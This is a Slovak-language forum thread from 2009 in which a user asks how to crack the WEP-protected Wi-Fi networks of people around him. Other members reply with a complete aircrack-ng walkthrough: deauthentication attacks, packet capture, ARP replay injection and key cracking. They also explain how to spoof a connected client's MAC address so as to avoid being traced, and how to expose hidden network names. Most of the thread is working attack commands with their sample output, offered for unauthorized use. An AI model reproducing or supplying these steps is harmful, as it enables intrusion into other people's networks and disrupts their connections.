prelomenie WEP s backtrackom3

trackback

Hovoriť o ne-podpore sieťovej karty bez toho aby ste sa bavili o chipsete je .. Kto chápe ten chápe, kto nie nech sa príde pozrieť ako sa veci robia - airdump.cz

ehm123

S pristihnutim by problem nemal byt, ale ak je doticny sikovny, tak moze odchytavat packety a to by bolo (aspon pre mna horsie) ako opletacky s fizlami. Ked uz tak pouzivat sifrovanu vpn

MakeFake

Stiahni si WifiSlax. Je to linuxova distribucia prisposobena na hackovanie wifi, obsahuje to vsetky nastroje vratane ovladacov.

hrban

mňa by len zaujímalo či sa dá zistiť skryté essid a ak áno tak postup ako

Andrew007

hrban napísal:mňa by len zaujímalo či sa dá zistiť skryté essid a ak áno tak postup ako

Samozrejme, myslim si ze sa do toho rozumies tak tu mas rovno postup

Kód: Vybrať všetko

Detekovane AP ma slusny signal, vidite i asociovane klienty ale AP nevysila ESSID.

Použijeme Aireplay prepínač -0 (Deuath). Ten odpojí dle konfigurace příkazu jednoho nebo všechny klienty na AP.

Deauth to broadcast (všesměr)

aireplay -0 5 -a 00:60:BX:xx:xx:xx wlan0

Deauth s definovanou MAC klienta.

aireplay -0 5 -a 00:60:BX:xx:xx:xx -c 00:60:BY:xx:xx:xx wlan0

Aireplay-ng zapis:

aireplay-ng -0 5 -a 00:60:BX:xx:xx:xx -c 00:60:BY:xx:xx:xx wlan0

Konzole zobrazí:


Deauth odpoji klienta (-y) asociovaneho na AP a v první konzole (Airodump) se objeví jméno AP (ESSID). Jak to? Klient u asociace na AP ESSID vyšle a Airodump ho zachytí. Pokuď útok funguje je to první prověrka Packet injection (je funkcni). Jako bonus máme jméno AP.


Vysvětlivky:
5 v příkazu znamená počet deauth paketu, ktere odešlete
-0 (nebo taky přepínač nula) je jeden z útoku (Deauth) Aireplay.

IMI · Príspevok od používateľa **IMI** » 14 nov 2009, 18:55

Zdravim,
kedze mam v mojom okoli vela ludi, kt. maju sifrovanie WEP tak by som chcel cracknut nejaku wifi siet na WIN XP ak by sa to dalo , mam tento adapter http://www.focus.sk/zoom.asp?img=IMAGES ... popis=6209 a neviem k nemu najst nejaky vhodny soft , kt. by s nim spolupracoval.Skuste mi nejako pomoct . Dik

hrban

Ovislink má celkom dobré routre dúfajme že to bude aj v prípade usb problém by mohol byť v OS radšej si stiahni Backtrack3 a daj si ho na CD/DVD mrkni sa na túto tému a tam je postup ako do 5-10 min crackneš akékoľvek WEP heslo

IMI · Príspevok od používateľa **IMI** » 14 nov 2009, 21:18

S linuxom niesom velmi kamarat tak preto sa pytam ci nieje nieco na win

//autoeditácia príspevku ( 14 Nov 2009, 21:18 )
No nic, skusam linux, stahujem ubuntu aj backtrack3 z lamiek, ked toto budem mat, mam to nacitat vo windowse a co dalej ? lebo z tych navodov na prvej stranke velmi nechapem...

hrban

ak sa rozhodneš pre ubuntu a rozbeháš tam to wifi napíš mi ja ti poradím ako ďalej tiež som stiahol ubuntu 8.10 a s tým robím až doteraz samozrejme už je to tak upravené distro že by ho nik nepoznal

ráno asi napíšem komplet návod ako sa dá využiť aircrack-ng spolu s wireshark-om
ubuntu a tuším aj backtrack sa dá spustiť aj priamo z cd len to napáliš a nastavíš boot z CD-ROM-ky a môžeš pracovať

IMI · Príspevok od používateľa **IMI** » 14 nov 2009, 23:03

ubuntu mam stiahnut aj nainstalovane ak vlozim do usb adapter najde nejake wifi siete, dalej co si mam stiahnut a co mam dalej robit ?

hrban

daj konzolu a príkaz

Kód: Vybrať všetko

sudo apt-get install aircrack-ng

potom si naštuduj toto

Kód: Vybrať všetko

http://www.aircrack-ng.org/doku.php?id=simple_wep_crack

riaď sa tým je to tam dobre popísné ráno z toho spravím výcuc

IMI · Príspevok od používateľa **IMI** » 14 nov 2009, 23:28

Ok, zajtra sa na to pozriem, a skus mi spravit ten hlavny vycuc. diky

hrban

čiže najskôr zisti interface name
príkaz

Kód: Vybrať všetko

sudo iwlist scan

vyhodí ti niečo ako

Kód: Vybrať všetko

ath0 no scan results
eth0 no scan results....
wlan0/wifi0 (u teba asi rausb0)
a názvy sietí s kompletnými info o sieti
kanál na ktorom vysiela a BSSID

daľej spusti monitor mode

Kód: Vybrať všetko

sudo airmon-ng start wifi0

nemusí tam byť na konci wifi0 malo by tam byť to čo ti oscanovalo tie siete
nabehne niečo takéto

Kód: Vybrať všetko

 Interface       Chipset         Driver
 
 wifi0           Atheros          ath5k
 ath0            Atheros          ath5k (parent: wifi0) (monitor mode enabled on mon0)

monitor mode máš už spustený na interface mon0 možno u teba sa to bude volať inak
spustíme odchytávanie packetov

Kód: Vybrať všetko

sudo airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output mon0

niečo takéto

Kód: Vybrať všetko

 CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 
                                                                                                              
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                            
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           
                                                                                                            
 BSSID              STATION            PWR  Lost  Packets  Probes                                             
                                                                                                            
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782

tu sa ti zobrazia aj klienti pripojený na AP resp ich MAC ktorá ti bude treba kvôli tvojej bezpečnosti vyber si jednu z nich a zmeň si ju (zmenu MAC popíšem neskôr)
-c 9 je kanám na ktorom vysiela AP, ktoré chceš cracknúť
--bssid je MAC adresa AP
-w output je názov súboru do ktorého sa ti budú ukladať odchytené pakety
otvor druhé terminálové okno a pusti príkaz

Kód: Vybrať všetko

sudo aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0

kde
-3 znamená zachytávanie ARP packetov a packet injection
-b 00:14:6C:7E:40:80 je MAC adresa AP
-h 00:0F:B5:88:AC:82 je MAC adresa nejakého clienta
zobrazí sa niečo takéto

Kód: Vybrať všetko

Read 629399 packets (got 0 ARP requests), sent 0 packets...

otvor tretie terminálové okno

Kód: Vybrať všetko

sudo aireplay-ng -0  5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:88:AC:82 mon0

týmto deautentifikuješ clienta on sa automaticky pripojí a ty tím získaš ARP packet potrebný pre packet injection
ak nezachitíš ARP packet počkaj cca 1 min a zopakuj (ARP packet by si mal zachytiť v druhom okne)
otvor štvrté okno a už len pusti aircrack a on už urobí všetko za teba

Kód: Vybrať všetko

sudo aircrack-ng cesta k súboru output.cab

zmena MAC adresy

Kód: Vybrať všetko

sudo ifconfig rausb0 down
sudo ifconfig rausb0 hw ether 00:11:22:33:44:55
sudo ifconfig rausb0 up

00:11:22:33:44:55 si daj nejakú z tých klientských MAC adries

IMI · Príspevok od používateľa **IMI** » 15 nov 2009, 17:20

Ok, dik ale ty mi pises uz asi rozsireny navod, ja mam nainstalovane Ubuntu a nic viac zatial, spustim terminal a zadam sudo iwlist scan a pise mi interface doesnt support scanning.. co mam este na ubuntu nainstalovat ? a na linuxe neviem rozbehat internet, nie wifi ale klasickku kablovku... diky za kazdu radu

btw:backtrack mam stiahnuty aj napaleny na cd.. mam ho vlozit do mechaniky restartnut a dat tei prikazy co pises ?

Andrew007

Nabootuj BT, nastartuj, prihlas sa, otvor si terminal (prikazovy riadok) a pis uz zhora uvedene veci..

btw. mozno ze budes mat hodnoty odlisne napr. meno sietovky ako napr, wifi0, rausb0, ath0...atd

IMI · Príspevok od používateľa **IMI** » 16 nov 2009, 21:51

presne tak som to urobil vlozil bt3 nabootoval, otvoril terminal a proste nechcelo mi rozpoznat adapter.. zblaaznim s z toho

a nechapem v com je problem, cisto v ubutnu sa to spravit neda, ez by som do toho vlozil este nejake linuxacke programceky.. ?

Gadelat

Pouzi backtrack 4

Andrew007

BT 4 teoreticky ma implantovane nove ovladace, tak skus novsiu verziu.

Gadelat

presne preto som to spomenul, WL-1600USB ma RTL8187 chipset ktoreho podpora v linuxe na tieto veci bola implementovana az niekedy v r. 2008, bt3 last update je 19.06.2008, bt4 11.02.2009

IMI · Príspevok od používateľa **IMI** » 17 nov 2009, 14:18

Dal som si BT4, hned ako zadam prikaz sudo iwlist scan mi pise, interface is doesnt support scanning

prelomenie WEP s backtrackom3

How to